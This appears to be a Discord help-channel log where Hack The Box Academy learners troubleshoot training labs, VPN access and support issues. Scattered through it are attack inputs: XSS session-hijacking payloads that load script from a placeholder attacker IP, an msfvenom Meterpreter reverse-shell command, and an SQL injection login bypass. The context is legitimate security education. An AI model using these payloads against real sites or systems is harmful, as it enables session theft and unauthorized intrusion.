And while RDP connecting to the provided ATTACK01 box the window is ridiculously small so reading Wireshark output is a struggle. And either way I'd like to take the advice and transfer files and findings back to my system, in this case I'd like to bring home my Wireshark packet capture for inspection.

I've tried mounting a directory with 'xfreerdp's 'drive' switch but I could then not find it anywhere in the file system, nor with 'mount':

xfreerdp /v:<ATTACK01 IP> /u:htb-student /drive:/home/<my user>/rdp_share,/home/htb-student/rdp_share

Any advice on how to get files home from ATTACK01?

is there any chance you could nudge somebody for this? I'm happy to remove anything that violates terms. Just want to get back on today if possible. nob1as is my email handle

I sent an email to customerops for the record

Only Support can help you with a platform ban. However, Support does not normally read Discord messages.
Please read through this FAQ to find and fix policy violations yourself.
https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

I guess just simple 'scp' gets the job done. I was thinking if I could have it mounted for easier transfer. If anyone knows how, respond if you feel like it. I'll be 'scp'ing until I know better... not that there's anything wrong with 'scp'...

hello why i have no access in the general chat

Please read #rules and follow #welcome

but could you tell me that could i have to verify myself and then i have to do

Just follow the instructions

ok tell me the instructions

They're in #welcome

Yo

HI !
Anybody can help me please !
https://academy.hackthebox.com/module/18/section/2093

Question :
What is the Type of the service of the "dconf.service"?

Tried:
─[eu-academy-6]─[10.10.15.18]─[htb-ac-2056516@htb-hrc0hoadlw]─[~]
└──╼ [★]$ sudo systemctl show dconf.service^C
┌─[eu-academy-6]─[10.10.15.18]─[htb-ac-2056516@htb-hrc0hoadlw]─[~]
└──╼ [★]$ systemctl list-units --type=service | grep dconf
┌─[eu-academy-6]─[10.10.15.18]─[htb-ac-2056516@htb-hrc0hoadlw]─[~]
└──╼ [★]$ systemctl list-unit-files | grep dconf
┌─[eu-academy-6]─[10.10.15.18]─[htb-ac-2056516@htb-hrc0hoadlw]─[~]
└──╼ [★]$ sudo systemctl show -p Type dconf
Type=

Any hint ?

Google is your friend

yes, i tried it !

wait, thx !

can anyone help me in "windows file transfer method". i cant able to connect with RDP, it shows tls handshake failed

Hi all

Executing query: SELECT * FROM logins WHERE username='tom' AND password = 'tom' or '1'='1';

Login successful as user: admin
What wrong ?

Try to log in as the user 'tom'. What is the flag value shown after you successfully log in?

you can dm me

contact me via the green chat bubble so I can help deal with you

mongod is a #starting-point machine, you'll have to read and follow #welcome instructions to access it

I can't login to access the green chat bubble...

you shouldn't have to log in, considering the fact that you can ask the chat bubble about log in issues

I'm not sure which chat bubble you're referring to

on the site?

yes

typically found at the bottom right there should be a little chat bubble thing (may need to disable adblock for it)

I'm still not seeing it after disabling my adblockers and trying a different browser, could you send me a screenshot by chance?

issue got solved with help of @opal shuttle , i changed to TCP instead of udp vpn.

try emailing then customerops@hackthebox.com

I did already this morning :/

ahhhh could be DNS

its always DNS https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Okay yup I got it now after changing my DNS settings back to default. 👍

thanks Rem. will do

is htb server currently down cuz i can't start insatnce?

https://status.hackthebox.com

everything looks fine to me

¯_(ツ)_/¯

try refreshing the page, changing vpn regions, logging out and back in

ok

yo

this isn't #general please read and follow the instructions in #welcome to gain access to the rest of the server

Good morning

hi, i want to subribe student course but my silver course is still available. How can I do to get student course immediately?

Idk I have the silver yearly plan

Gonna go for a drive get my mind right for a day of learning

reach out to support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

I need some help

SOCKS5 Tunneling with chisel, I transferred my file over to the compromised server but im getting this error:
~$ ./chisel
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)

How can I fix this?

statically compile it or use an older version

Hi I'm working on the Pass the Ticket from Windows Section and am currently stuck on the second question:

Use john's TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \DC01.inlanefreight.htb\john

I have tried to run the commands from the section both with mimikatz and Rubeus to get the ticket for john. However when looking at the output there is no john user to be found. Julio is there and some others but no john and doing the dir *.kirbi gives me the same.

Anyone have any idea on how to continue further or a hint to push me in the right direction?

If you exported all tickets and the user you need wasn't included in that export, I would try it again. If this still doesn't provide the ticket, restart the lab, give it a couple of extra minutes after it displays the target IP to ensure things are completely setup, then try it again.

will try that thank you

If that doesn't work, you can DM and I will take a look at your command and output.

hello

Hi, welcome. This channel is dedicated for discussion of the modules on Academy. Please read the #rules and follow the instructions in #welcome to gain access to more appropriate channels for general greetings.

Hey all. I'm struggling with the File Inclusion Skills Challenge. I can poison the log but whenever I try to get RCE the log seems to die and I have to restart the server. I never get any command output in the log. Any thoughts?

Tried with Burp and just with curl

make sure you bear in mind the quotes being used

I tried both single and double quotes and it didn't seem to make a difference

one will brick the log and you'd need to reset the lab to get it to work properly again

Ok I'll play around with it some more. Thanks!

yo

Hi, welcome. This channel is dedicated for discussion of the modules on Academy. Please read the #rules and follow the instructions in #welcome to gain access to more appropriate channels for general greetings.

hello
in pass the hash from password attack module stuck for about a long with the davids hash to read the file david.txt

restarting the lab ended up working for me. Thank you

anyone free to help me

Ok I'm using the proper quotes, or at least it isn't bricking the log anymore and is showing my URL request with the command, but I still don't see any command output in the log

Ok no idea what's happening but I literally just up arrow + entered and am getting command output now

You need to import david's ticket i guess

Then you will get new cmd

As david, then you will be able to access that one

Module Name: Linux Privilege Escalation
Section Name: Environment Enumeration
https://academy.hackthebox.com/module/51/section/1592
Question you're struggling with:
I'm unable to ssh into the target server. The error I get is ssh: connect to host 10.129.xxx.xxx port 22: Connection timed out.
Generally what you've tried (while avoiding spoilers, i.e. logged in as j and couldn't find anything)*
I connected to the vpn and ran ssh htb-student@10.129.xxx.xxx.

support hasnt responded to me

it's been a day I need to buy the exam, it wont let me

I've found that asking for help in the wrong channel gets more attention
Still I try my best to remember the correct channel to use because it's kinder.

Module Name: Getting Started
Section Name: Service Scanning
https://academy.hackthebox.com/module/77/section/726
Question you're struggling with:
when I conduct an nmap scan I get a "Note: Host seems down" although I'm attempting to scan the ip address specified in the module: 10.129.42.253
Generally what you've tried I've tried using the more detailed nmap scan

Have you connected to the vpn?

Guys Any way to remove Credit Card from the Academy HTB.

yep - I wondered if that might have been the issue but I've checked I'm connected to the vpn - I got the 'Initialization Sequence Completed' response when I ran the openvpn

There is only one way to update the card not to remove

You will need to reach out to support on the site and ask

Ok

Run ip address and send the result here.

Looks like you have the same issue as me then.

Or, similar.

ah really? are you experiencing this too?

.

hey, anyone having issues with the vm for "AD Enumeration & Attacks - Skills Assessment Part I"? it's incredibly slow, i can't get a shell for more than 20 seconds, the entire thing hangs
already tried resetting

Hi guys, could use some help with findings from the Reporting module.

1. One vulnerability found in 2 different places (like an xss in 2 different subdomains) should be presented as one or two findings?
2. Exploiting 2 different AD permissions (like GenericWrite, ExtendedRight, AddSelf,...) for different purposes should be presented as N different findings or just one broader Active Directory ACL Abuse? Same with kerberoasting and cross-forest kerberoasting.
3. What if I use a certain finding, to exploit another one? Should I leave this for the attack-chain or should I mention it in the detailed walkthrough of the finding?

Module:
ICMP tunneling with ptunnel-ng
Error:
$ sudo ./ptunnel-ng -r10.129.202.64 -R22
./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory

I need some guidance here, do I just need to use an older version?

hey, I opened a request through the chat bubble. is it possible you could take a look at this today?

Website support is not provided in Discord, you'll need to wait for a reply.

Compile the binary on an older OS like an Ubuntu 20.04 or some Linux Mint

Reference this part of the section Alternative approach of building a static binary

just out of interest, when I did an nmap scan of my own ip it worked, so perhaps it is the 10.129.42.253 host that is down?

That's what I think too.

I tried pinging the ip I was provided and didn't get a response.

If you do a trace route to the host, where does it stop?

10.10.14.1 is already on the other side of the tunnel. There could be some issue with their internal network

I suggest switching VPN servers. Just download a different OVPN file and see if it works

How long is the CJCA exam?

brilliant - thanks @proven plinth - I'll give it a go! 👌

seems like the same result with a different OVPN file unfortuately:

Try changing regions instead

I suggest to also double check how many tunnel interfaces you have up (using ifconfig) after switching servers. I once made the mistake of having 2 academy openvpn tunnels up and caused an IP conflict.

If that happens use "ps aux | grep openvpn", find the program id and kill the duplicates

@proven plinth @cloud urchin really appreciate the advice - thank you! 🙏

When I ran traceroute it just gives a bunch of asterisks.

sounds like you're not connected

Using configuration profile from file: /tmp/.../academy-regular.ovpn
Session path: /net/openvpn/v3/sessions/...
Connected```

Oh I disabled compression, could that be it?

doubt it, but who knows. i just use openvpn <vpn file> & when i launch it

make sure you don't have multiple vpn connections and are also not using the pwnbox at the same time. if all that is fine, try re-downloading a TCP VPN file from a different server or region and try agian.

Oh I was using UDP.

I have only one vpn connection, not using the pwnbox. I'm using a TCP config file for US EAST that has compression disabled, and it doesn't work.

k then try what i said

US East isnt an academy vpn file location

That's a pwnbox location

oh

Oh nvm I'm using EU Academy 5.

I don't have openvpn as a command, only openvpn3, which requires a command as an argument.

¯_(ツ)_/¯

It's the same thing really

Your binary is just labeled as openvpn3

It doesn't accept putting the file immediately after openvpn3.

If your ovpn file is in downloads, ./Downloads/filename.ovpn

Or ~/Downloads/filename.ovpn

"Doesn't accept" im assuming it gives the "cannot read" error?

openvpn3: Unknown command '/tmp/.../academy-regular.ovpn'

Normally I run session-start like this.

guys hello has anyone completed wpa 2 attacks module if someone did I need some help

Oh so yours is a whole different syntax altogether

I also generally dont recommend saving your vpn config in /tmp/, just save it in home

I don't save it. I typically re-download it every time.

You dont have to, is why my point is lol

If I don't redownload, I save it in an easier location on my main computer and just drag it over when I need to use it.

Why not just use it in the easier location? You don't need to put it in /tmp to use it.

Eh

That way you're also saving yourself from needing to redownload it every time

Whatever workflow works

guys hello has anyone completed wpa 2 attacks module if someone did I need some help

You are in a wrong place bro we are sorry

No problem man

Sorry e

Everyone

The easier location is on my home computer, not my virtual machine. Also it stops being easy after a while because it's my download folder.

So I delete it occasionally, like today.

👆

Anyways I still can't ssh.

And traceroute still has asterisks.

Are you using the pwnbox too?

hello

No, my own parrot virtual machine.

can someone help me? im stuck with the machine called "era", is my first medium, i got the admin user and the 3 answers to the quesions, but the web tell me that im wrong and i dont think it is, any help frop private? please im stuck for 1h

Read and follow the instructions in #welcome; and theres #1398707252629733436

okay sorry

working on 'Web services and API attacks', section: "api attacks", Struggling with question 8 (final assessment). using a simple curl script to send the request, I keep getting errors indicating that I've not yet correctly formed a valid soap request. any advice would be very welcomed. I'm attempting to simply get a valid login response to continue testing that but I'm unsure as to what I've got wrong.

Hi, Can i get some advice on the pivoting, tunneling and port forwarding module? I am trying to answer "Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)" but I am having trouble with creating a Meterpreter shell. I constructed the payload by using: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080. The LHOST I set to 172.16.x.x & I copied the payload to the pivot server via using scp. I ran msfconsole & ran the ./backupjob but my msfconsole exploit does not connect to the pivot server. Am I doing this wrong? I have been trying to use different ip addresses & ports from the pivot host but I am still having the same error.

violently suppresses urge to insert 'pivot' gifs

😆

Isn't the LHOST within the multi handler options supposed to be set to 0.0.0.0?

got him thanks r1cky

yes that is correct. To my understanding when making the payload via msfvenom the lhost needs to be the internal ip of the pivot host. so the lhost on msfconsole would be 0.0.0.0 & the lhost when making the payload would be the pivots internal ip

You can just DM so I can see what all you have going on.

Skills assessment?

Yeah

Did you check what you can use from what they already give you?

So, I might be confused because it doesn't appear to me like I've got something that will do what it's asking to do. The way I'm interpreting this is that I have to fuzz the values within the soap envelope and/or the URL, does that sound like I am understanding this correctly?

bro how do I find the password for admin
bruteforcing takes a hell lot of time

have you done the tried and true: admin:admin?

They should have already given you something to work with?

🤔 ok, I'll check again.

Is this not correct?

“Assess the target, identify an SQL Injection vulnerability through SOAP messages and answer the question below”

yes'

im bruteforcing via rockyou.txt lets see

that's the one. there's a python script that will check 'id's, I can modify it to try intruder payloads...

all I'm getting back is "enter a valid param for HackTheB0X API"

So what do you think you should modify with? What do you want it to check? You said it yourself earlier

Did you analyze the wsdl?

Figure out what to modify and what payload you can use.

To get a valid “login”

The question itself pretty much gives it away tbh

I'm sure it does, but something about this module didn't 'click' for me so I don't feel like I understand what's going on.

ill pm you

k

does buying the annual membership provide module walkthroughs for all paths??

yes

but i would advise against using the walkthrough until you've exhausted all other options tbh

I'm not planning on doing tutorials all the way through, but there have been times I'm doing things right and it's just wrong versions of tools or there have been overlapping concepts that don't get revealed until modules down the path.

There's a good reason that some concepts come back, and are explained more in-depth, at a later module.
Let's take the Footprinting and the Attacking Common Services modules as examples of this:
The goal of footprinting is to gain basic information without necessarily attacking the surface, more of a surface level skimming the water, so the goal isn't to attack rather to gain info. I.e. judging the water's depth.
The goal then of Attacking Common Services is to actively go after those services in other ways that gain you even more access.
This explains, in-part, why the FTP and SMB sections really only have you focus on the bare minimum -- anonymous/null sessions to gather info in footprinting

you don't need to go in-depth if you're just looking at the surface for something easy to latch onto

That's not what I mean, theres a difference between lightly touching over a subject vs not mentioning it in the module at all.
For example, I believe it's either attacking passwords or attacking common services where I had to use SQL injections to compromise servers. To you it may seem like common knowledge but the module didn't touch on that at all, it wasn't until later on in the path that I learned about it.

i don't recall SQLi being part of Password Attacks or Common Services but i'm going back over modules so i'll try and keep it in mind. Not doubting what you said, just not in my memory vault

Yes lol, I remember because I spent the whole day on that one box. Not exaggerating either. It was very frustrating, let me see if I still have the notes.

Where is SQLi in password attacks? I just finished that module and I dont think I had to

The Skills assessment?

Attacking Common Services - Skills assessment Hard
SQL Injection/Impersonation of privileges, I think the box said there was two ways to do it, but either way should be at least touched upon in the module.

yeah there's a far different method than SQLi; i don't even remember tbh but it was all methods taught in the module

Everything is taught in the module.

The SQL portion is covered in that module and the two ways skills assessment was the easy one and both ways to do that one are covered.

Hello, im trying to go through the Session Hijacking part of this module and attempting to input
<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement('script');a.src='http://our_ip/';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://our_ip"/)</script>
these scripts with my IP:80 in place of OUT_IP, I have a PHP server listening on my IP:80 and have sent curl get request to make sure it does recieve requests on this ip and port, but none of these scripts work when inputing them in the Fullname, Username, and Profile Image Url boxing and hitting register, I don't get any GET requests sent to my php server whatsoever and am trying to truble shoot the problem and would appreciate ideas.

Thank you for yalls time

hello

anyone available to help

don't ask just ask

In pass the certificate attack on academy htb to solve the question what should i do
i tried how they showed but not working

@cloud urchin what attack should i try suggest some name or other things

i haven't done the updated module

Hii

solved if anyone else has this issue, you have to use the private network IP that gets setup when you setup the vpn to connect to HTB not your systems public IP address

https://nohello.net; this isn't #general if you want access to chat there you'll need to read and follow the instructions in #welcome

in hindsight that's a bit obvious, the private ips don't have public internet access, and routing is heavily limited.

i apologize it wasnt obvious to me 🙂

sorry i wasn't available at the time to help walk you through the process of figuring it out

So, is this server for learning how to hack?

hey no problem im just glad that i was able to figure it out, now itll stick with me 😄

it revolves around the various services that hackthebox offers, this particular channel is revolving around helping with the various modules found on https://academy.hackthebox.com/

Private Addresses is a key concept in networking, I suggest taking the modules Introduction to Networking or Networking Foundations to learn more

Ohhhh ok

in short; legal hacking is the name of the game, not ddos or anything that would negatively impact a business

ill look into that, its not in the bug bounty path, but i got access to all up to tier II so thatll definitly clear up some confusion

-# Casually runs nmap on T5 with 10000 minimum rate

I recommend you go through some of the modules in the Information Security Foundations path that are relevant to that pathway before continuing

So say my account got compromised (not asking for assistance here) but if I hacked my way into my account after it got compromised, it would be legal since it's technically still mine?

that would be illegal

That's illegal

the account isn't yours, a company just gives you the namespace

you don't own any of your accounts they are loaned to you by the company you created the account with. For more information read the terms of service.

^

Ahhh ok

it's why companies are allowed to just ban you/revoke your access to said account

the most advice you'll get here regarding account recovery is reaching out to the company in question's support team

I thought it was mine because I created it 😅

Right, got it 🙏🏻✨

nope

in the ever expanding digital landscape it's not an ownership, it's a loan agreement

So the admins of discord is essentially the landlords of our accounts whilst we're just the tenants?

you "creating" your account is just requesting the username/namespace from the company, and them granting it to you (so long as you abide by their terms of service)

Correct

yep

Right- makes sense

it's why, as a public discord especially, we have to abide by the Discord Terms of Service alongside the HTB Terms of Service

In pass the certificate attack on academy htb to solve the question what should i do
i tried how they showed but not working

man someone please give me any idea

Because I've been wanting to learn how to hack, because that way I can learn how to stop my account from getting hacked cuz I'll know all the tricks, then I'll know how to protect my account against them

i don't recall having too many issues following the attack path as described in that section

none working

just make sure you have ntlmrelayx running, and running the one thing (i think pywhisker) in a venv as described

That actually makes alot of sense

the best way to not get your account hacked is to not run any sketchy programs or click on suspicious links

basic internet safety ¯_(ツ)_/¯

since 199x

printerbug?